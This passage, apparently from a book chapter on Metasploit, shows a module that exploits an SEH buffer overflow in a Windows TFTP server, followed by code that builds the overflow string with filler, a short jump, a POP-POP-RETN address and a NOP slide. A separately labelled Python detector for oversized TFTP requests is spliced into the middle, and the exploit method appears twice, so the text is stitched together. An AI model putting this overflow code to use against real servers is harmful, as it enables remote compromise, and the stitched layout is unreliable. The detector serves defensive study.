228
Chapter 15
      'Payload'        =>
        {
          'Space'           => 412,                  # bytes available for the payload
          'BadChars'        => "\x00\x20\x0a\x0d",   # bytes the payload must avoid
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP2', { 'Ret' => 0x41414141 } ],
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 3 2008'))

    register_options([
      Opt::RPORT(69)     # default TFTP port
    ], self.class)
  end

  def exploit
    connect_udp
    print_status("Trying target #{target.name}...")
    udp_sock.put(sploit)   # send the malicious string in one UDP datagram
    disconnect_udp
  end
end
Because this exploit uses the Trivial File Transfer Protocol (TFTP), we need to include the Msf::Exploit::Remote::Udp mixin. And because it manipulates the structured exception handler, we also need to include the Msf::Exploit::Remote::Seh mixin to gain access to certain functions that deal with SEH overflows. Because TFTP servers typically listen on UDP port 69, we declare that port, with Opt::RPORT(69), as the module's default. Lastly, once the malicious string is built, it is put on the wire with udp_sock.put(sploit).
We begin with the same skeleton as our original Python exploit for this TFTP server, shown earlier in this chapter, and add its major parts to the exploit method.
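Seen from the other side of the wire, this module sends a single UDP datagram to port 69 whose BadChars list rules out NUL, so the malicious string arrives as one overlong, unterminated TFTP request field. The following Python parser for RFC 1350 read/write requests flags such datagrams; it is an added example, not code from the book or from Metasploit, and its length threshold and sample datagrams are constructed.

```python
import struct

# Constructed thresholds (assumptions, not values from the book): a genuine
# filename or transfer mode is a short, printable, NUL-terminated string.
MAX_FIELD_LEN = 255
KNOWN_MODES = {b"netascii", b"octet", b"mail"}

def parse_tftp_request(datagram):
    """Parse an RFC 1350 RRQ/WRQ (opcode, filename NUL, mode NUL).
    Returns None for non-requests; 'mode' is None when the request is not
    NUL-terminated, in which case the whole tail is one oversized field."""
    if len(datagram) < 4:
        return None
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (1, 2):  # 1 = RRQ, 2 = WRQ
        return None
    fields = datagram[2:].split(b"\x00")
    # A well-formed request ends in NUL, so split() yields at least 3 parts.
    if len(fields) < 3:
        return {"opcode": opcode, "filename": fields[0], "mode": None}
    return {"opcode": opcode, "filename": fields[0], "mode": fields[1]}

def inspect_tftp_request(datagram):
    """Return a list of findings; an empty list means the request looks ordinary."""
    req = parse_tftp_request(datagram)
    if req is None:
        return []
    findings = []
    for name in ("filename", "mode"):
        value = req[name]
        if value is None:
            findings.append(f"{name} field missing or not NUL-terminated")
            continue
        if len(value) > MAX_FIELD_LEN:
            findings.append(f"{name} field is {len(value)} bytes (limit {MAX_FIELD_LEN})")
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append(f"{name} field contains non-printable bytes")
    if req["mode"] is not None and req["mode"].lower() not in KNOWN_MODES:
        findings.append(f"unknown transfer mode {req['mode'][:16]!r}")
    return findings

# Constructed sample datagrams (not captures from the book).
BENIGN_RRQ = b"\x00\x01" + b"boot.cfg\x00" + b"octet\x00"
# Mirrors the module's string: 1019 filler bytes, a short jump and a NOP
# slide, with no NUL anywhere, so the whole tail parses as one field.
OVERFLOW_RRQ = b"\x00\x01" + b"\x41" * 1019 + b"\xeb\x08\x90\x90" + b"\x90" * 16
```

Run inspect_tftp_request() over datagrams captured on UDP/69; the benign request yields no findings, while the overflow request trips the length, printable-bytes and missing-mode checks at once.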
  def exploit
    connect_udp
    print_status("Trying target #{target.name}...")
    evil = "\x41" * 1019          # filler up to the SEH record
    evil << "\xeb\x08\x90\x90"    # short jump (nSEH)
    evil << "\x58\x14\xd3\x74"    # POP-POP-RETN (SEH handler)
    evil << "\x90" * 16           # NOP slide
    evil << "\xcc" * 412          # dummy shellcode